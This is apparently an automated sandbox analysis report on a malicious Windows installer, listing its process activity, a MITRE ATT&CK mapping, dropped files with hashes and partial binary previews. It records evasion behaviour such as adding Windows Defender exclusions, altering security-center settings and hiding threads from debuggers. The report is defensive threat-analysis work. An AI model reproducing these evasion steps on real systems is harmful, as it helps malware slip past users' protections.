Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmpCode function: 11_2_6C9E7700 cpuid 11_2_6C9E7700
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A7AB2A GetSystemTimeAsFileTime,17_2_00A7AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00B10090 GetVersion,17_2_00B10090

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATEJump to behavior
Source: svchost.exe, 00000003.00000002.1606205609.0000020511702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		2
Disable or Modify Tools		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Native API		11
Windows Service		1
Access Token Manipulation		1
Deobfuscate/Decode Files or Information		LSASS Memory3
File and Directory Discovery		Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Command and Scripting Interpreter		Logon Script (Windows)11
Windows Service		3
Obfuscated Files or Information		Security Account Manager36
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Service Execution		Login Hook111
Process Injection		1
Software Packing		NTDS461
Security Software Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets251
Virtualization/Sandbox Evasion		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
Masquerading		Cached Domain Credentials2
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items251
Virtualization/Sandbox Evasion		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Access Token Manipulation		Proc Filesystem2
System Owner/User Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
Process Injection		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580393 Sample: #U5b89#U88c5#U52a9#U624b2.0.5.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 92 92 time.windows.com 2->92 94 Multi AV Scanner detection for dropped file 2->94 96 Found driver which could be used to inject code into processes 2->96 98 PE file contains section with special chars 2->98 100 2 other signatures 2->100 11 #U5b89#U88c5#U52a9#U624b2.0.5.exe 2 2->11         started        14 svchost.exe 2->14         started        17 cmd.exe 2->17         started        19 30 other processes 2->19 signatures3 process4 file5 90 C:\...\#U5b89#U88c5#U52a9#U624b2.0.5.tmp, PE32 11->90 dropped 21 #U5b89#U88c5#U52a9#U624b2.0.5.tmp 3 5 11->21         started        114 Changes security center settings (notifications, updates, antivirus, firewall) 14->114 25 sc.exe 17->25         started        27 sc.exe 1 19->27         started        29 sc.exe 1 19->29         started        31 sc.exe 1 19->31         started        33 22 other processes 19->33 signatures6 process7 file8 78 C:\Users\user\AppData\Local\...\update.vac, PE32 21->78 dropped 80 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 21->80 dropped 102 Adds a directory exclusion to Windows Defender 21->102 35 #U5b89#U88c5#U52a9#U624b2.0.5.exe 2 21->35         started        38 powershell.exe 23 21->38         started        41 conhost.exe 25->41         started        43 conhost.exe 27->43         started        45 conhost.exe 29->45         started        47 conhost.exe 31->47         started        49 conhost.exe 33->49         started        51 conhost.exe 33->51         started        53 20 other processes 33->53 signatures9 process10 file11 76 C:\...\#U5b89#U88c5#U52a9#U624b2.0.5.tmp, PE32 35->76 dropped 55 #U5b89#U88c5#U52a9#U624b2.0.5.tmp 4 16 35->55         started        104 Loading BitLocker PowerShell Module 38->104 59 conhost.exe 38->59         started        61 WmiPrvSE.exe 38->61         started        63 Conhost.exe 41->63         started        signatures12 process13 file14 82 C:\Users\user\AppData\Local\...\update.vac, PE32 55->82 dropped 84 C:\Program Files (x86)\Windows NT\hrsw.vbc, PE32 55->84 dropped 86 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 55->86 dropped 88 C:\Program Files (x86)\Windows NT\7zr.exe, PE32 55->88 dropped 106 Query firmware table information (likely to detect VMs) 55->106 108 Protects its processes via BreakOnTermination flag 55->108 110 Hides threads from debuggers 55->110 112 Contains functionality to hide a thread from the debugger 55->112 65 7zr.exe 2 55->65         started        68 7zr.exe 7 55->68         started        signatures15 process16 file17 74 C:\Program Files (x86)\...\tProtect.dll, PE32+ 65->74 dropped 70 conhost.exe 65->70         started        72 conhost.exe 68->72         started        process18

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
#U5b89#U88c5#U52a9#U624b2.0.5.exe0%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc24%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-3SJ46.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-3SJ46.tmp\update.vac24%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-GHUQ4.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-GHUQ4.tmp\update.vac24%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
time.windows.com
unknown
unknownfalse
    		high

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U52a9#U624b2.0.5.exefalse
      		high
      https://www.remobjects.com/ps#U5b89#U88c5#U52a9#U624b2.0.5.exe, 00000004.00000003.1277615508.0000000003590000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.exe, 00000004.00000003.1278543122.000000007F86B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000000.1280165742.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000000.1383564167.0000000000C8D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp.4.drfalse
        		high
        https://www.innosetup.com/#U5b89#U88c5#U52a9#U624b2.0.5.exe, 00000004.00000003.1277615508.0000000003590000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.exe, 00000004.00000003.1278543122.000000007F86B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 00000006.00000000.1280165742.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp, 0000000B.00000000.1383564167.0000000000C8D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.5.tmp.4.drfalse
          		high

          World Map of Contacted IPs

          No contacted IP infos

          General Information

          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1580393
          Start date and time:2024-12-24 13:12:07 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 11m 5s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Run with higher sleep bypass
          Number of analysed new started processes analysed:98
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Critical Process Termination
          Sample name:#U5b89#U88c5#U52a9#U624b2.0.5.exe
          renamed because original name is a hash value
          Original Sample Name:2.0.5.exe
          Detection:MAL
          Classification:mal92.evad.winEXE@129/33@1/0
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 77%
          • Number of executed functions: 28
          • Number of non-executed functions: 75
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

          Warnings

          • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
          • Excluded IPs from analysis (whitelisted): 40.81.94.65, 13.107.246.63, 20.12.23.50
          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: #U5b89#U88c5#U52a9#U624b2.0.5.exe

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASNs

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Program Files (x86)\Windows NT\7zr.exe#U5b89#U88c5#U52a9#U624b2.0.2.exeGet hashmaliciousUnknownBrowse
            #U5b89#U88c5#U52a9#U624b2.0.3.exeGet hashmaliciousUnknownBrowse
              #U5b89#U88c5#U52a9#U624b2.0.1.exeGet hashmaliciousUnknownBrowse
                #U5b89#U88c5#U52a9#U624b2.0.6.exeGet hashmaliciousUnknownBrowse
                  #U5b89#U88c5#U52a9#U624b2.0.7.exeGet hashmaliciousUnknownBrowse
                    #U5b89#U88c5#U52a9#U624b2.0.4.exeGet hashmaliciousUnknownBrowse
                      #U5b89#U88c5#U52a9#U624b2.0.2.exeGet hashmaliciousUnknownBrowse
                        #U5b89#U88c5#U52a9#U624b2.0.3.exeGet hashmaliciousUnknownBrowse
                          #U5b89#U88c5#U52a9#U624b2.0.1.exeGet hashmaliciousUnknownBrowse

                            Created / dropped Files

                            C:\Program Files (x86)\Windows NT\7zr.exe

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):831200
                            Entropy (8bit):6.671005303304742
                            Encrypted:false
                            SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                            MD5:84DC4B92D860E8AEA55D12B1E87EA108
                            SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                            SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                            SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Joe Sandbox View:
                            • Filename: #U5b89#U88c5#U52a9#U624b2.0.2.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b2.0.3.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b2.0.1.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b2.0.6.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b2.0.7.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b2.0.4.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b2.0.2.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b2.0.3.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b2.0.1.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................

                            C:\Program Files (x86)\Windows NT\file.bin (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):1839696
                            Entropy (8bit):7.999886083195026
                            Encrypted:true
                            SSDEEP:49152:xtf/Ncq8cVEEhPBMp8NcD8GROsSzBltnw7sK:xtCILNcD8GgsSzXtnw7T
                            MD5:AEE77D886C26E516786EDF2DEABC2A7E
                            SHA1:5803AA2C3A033DB5C923C69AA51B24B54A0A88FB
                            SHA-256:F804B51355D79AD91AE47B2AFA19B7FC39931DE06103D14CE3924BD197CEDCE6
                            SHA-512:F6F9AEB2B604D7CF73B8C2AA8100D7B4F49B6D6F002B1178CDC0CAAC3F6C850CCF82515017CBCFD412E390AB0E3AEE313F48074BEDD534F33DF7E1B4E676BB6C
                            Malicious:false
                            Preview:.@S....Sj....................!Z._......dJ...i.Q}[.../u"l..._...A..m.gd.......v..@:z.Q!.&.&.$.@.t|....4.....}_..{..w....F....4. !.'P.8!j.....4)j!..M8E...$4mr....a.|...O.i...{w..5.>.H....u..U.....>.#..(+.S.Y._....P...G]..DZI. ..L..cf..z.....|.......F..~..X].!.q....U....LB@sU.,.w8..s.h...u.....|*.........H.}V.GOuK.*7HwKc.=.hq...8.._u.]B.s..y...3...R..:.....9..a...b..7M..~.....1*...7.R.RW.v.a.jdY....=...(..t$B...e......*.........W.Cl.........sE........I.....9........,`.Cj........n.J.....L].|..,.o_..'.#...*....G.....9.{....{..3...c..S&.\.Dg..^.S...~&....tW.......4...*....|.d..V......?=e.....x......*.g....e.J..t...2.....B.vgE..L4...o(>...?q..Q..bt*L...l.@"...}8...a..s...#/..`......ZxCk;..E.k..|..=.0...s..st.lZ...a...T...ZE*.).O.......M.R.[.o.s.,X.;y..J3.,.....CGnp..R.P.e.]|B$U.........c..x.a8xk.`D)E<...6.6.V........S..l/..Z.{..Tf..[..9.S...O}........i..K.zA..).9.^......4..`K.'.p..+s.@0.U.U...U.....!&.M.5....dtb.*8...._P...n..+

                            C:\Program Files (x86)\Windows NT\hrsw.vbc

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606016
                            Entropy (8bit):7.0063494494702985
                            Encrypted:false
                            SSDEEP:49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
                            MD5:95ACD5631A9131DB1FD066565AFC9A67
                            SHA1:8E9473BD632FF0F57FC34EECAC17174341D80D94
                            SHA-256:EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
                            SHA-512:70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 24%
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Fig...........!.....h....................................................7...........@.........................XC.......J..<....07.X....................@7..?...................................................K...............................text....f.......h.................. ..`.rdata..T............l..............@..@.data................b..............@....00cfg.......`(......"(.............@..@.tls.........p(......$(.............@....voltbl.F.....(......&(..................#.q....P.....(......((............. ..`.rsrc...X....07.......6.............@..@.reloc...?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

                            C:\Program Files (x86)\Windows NT\is-490PE.tmp

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):1589569
                            Entropy (8bit):7.999901863430879
                            Encrypted:true
                            SSDEEP:24576:v5v7d85bpwCIcOT5hc2Qe4Uz9ba8VcpMvl1JdrYdVUtuj8rGucZ+0LsX1VHqQZf8:BvGXwaOdaUzMGLAiRh7KQ5tpoR
                            MD5:77F6ED0F9554EA74050C5A8FDB365A30
                            SHA1:84111F13FB1AB25E61BD88FF0A7C4B61C40E2C8E
                            SHA-256:524961C6D57B298D6AE7B621D54C5C61C0646095C2C4D733C62A8A0D34EE7443
                            SHA-512:7B106EE9262D47C5CDB989D091842733BE6B2A5BE4230A95A6F52969CCECE7B33255FFCD5492563A00F8E408D376078AAF45DE5653CC6766C73070EA169021F4
                            Malicious:false
                            Preview:....7y|[.G...y,Ec..{.$\*....d:d.......a.oR.11;...k!..]..+=..T...L..@..fj [_..../?.f..unW%>.#.-..@ >...)j.....t.l.Z.N.;.a.........A...**.i......+...-..t}:5.,.....n..6._?._9..8_...h...9r...........fs.b.....!..s...{.E...).9..`...:c4.........2!..5`lU.f.'.X]9q.^."...x%.L%>..F..'....I..[g.6...\..`.&<.`vu...q.Oq..h~........"z......_.A/.`1..uc....D.8<3./...[.......4W..._.uO.B.n.q>.......T\.......Q..;.}..z6...m....@...2....=..zp..h......-.yG.D.8......U..)5..Y....iG.....i......A..Kq0.t..q...;........4...........4...q.f_..<...lf.y..2.......9...j..6....|...|]...q....+..XbL_...C*A^..O.*._.. ..H.e*.,.9.'.........y..hFyd..d...J.. Jz:R..l....l&....5...+.m.M,.....`..Bu.V.G,0wj..M....j..i..........~d..".3..k...Jc.HD...VG....y..<....dg....:.&..BD.\D hp.D1.s..MF...c..!.....0.A..?.....6.....}4.+......VWz.N.!.....%0..B.F.....?......*..G9I.Y0.........=..&.e.P....1..}.!....U.9........a......pnF..:d...x.fPJ...=..s.k......?...*..L.wy.......$...l$....._.....p#..&

                            C:\Program Files (x86)\Windows NT\is-NDNFB.tmp

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):1839696
                            Entropy (8bit):7.999886083195026
                            Encrypted:true
                            SSDEEP:49152:xtf/Ncq8cVEEhPBMp8NcD8GROsSzBltnw7sK:xtCILNcD8GgsSzXtnw7T
                            MD5:AEE77D886C26E516786EDF2DEABC2A7E
                            SHA1:5803AA2C3A033DB5C923C69AA51B24B54A0A88FB
                            SHA-256:F804B51355D79AD91AE47B2AFA19B7FC39931DE06103D14CE3924BD197CEDCE6
                            SHA-512:F6F9AEB2B604D7CF73B8C2AA8100D7B4F49B6D6F002B1178CDC0CAAC3F6C850CCF82515017CBCFD412E390AB0E3AEE313F48074BEDD534F33DF7E1B4E676BB6C
                            Malicious:false
                            Preview:.@S....Sj....................!Z._......dJ...i.Q}[.../u"l..._...A..m.gd.......v..@:z.Q!.&.&.$.@.t|....4.....}_..{..w....F....4. !.'P.8!j.....4)j!..M8E...$4mr....a.|...O.i...{w..5.>.H....u..U.....>.#..(+.S.Y._....P...G]..DZI. ..L..cf..z.....|.......F..~..X].!.q....U....LB@sU.,.w8..s.h...u.....|*.........H.}V.GOuK.*7HwKc.=.hq...8.._u.]B.s..y...3...R..:.....9..a...b..7M..~.....1*...7.R.RW.v.a.jdY....=...(..t$B...e......*.........W.Cl.........sE........I.....9........,`.Cj........n.J.....L].|..,.o_..'.#...*....G.....9.{....{..3...c..S&.\.Dg..^.S...~&....tW.......4...*....|.d..V......?=e.....x......*.g....e.J..t...2.....B.vgE..L4...o(>...?q..Q..bt*L...l.@"...}8...a..s...#/..`......ZxCk;..E.k..|..=.0...s..st.lZ...a...T...ZE*.).O.......M.R.[.o.s.,X.;y..J3.,.....CGnp..R.P.e.]|B$U.........c..x.a8xk.`D)E<...6.6.V........S..l/..Z.{..Tf..[..9.S...O}........i..K.zA..).9.^......4..`K.'.p..+s.@0.U.U...U.....!&.M.5....dtb.*8...._P...n..+

                            C:\Program Files (x86)\Windows NT\locale.bin

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):56562
                            Entropy (8bit):7.997362278243266
                            Encrypted:true
                            SSDEEP:1536:R0LJTdsTl50XcK85pRUf20ZZmQPMTpKyn:RoVdsTPK8rN0PTyn
                            MD5:B5C6B4D2B268DD9704486761D80D910C
                            SHA1:BDA77B2E009BBF8785DE135B5FA28A584AB9F8E3
                            SHA-256:9EA66FE4BBD81419FF083AC21EB847620952B3E664916D4B9800325B36A9B47F
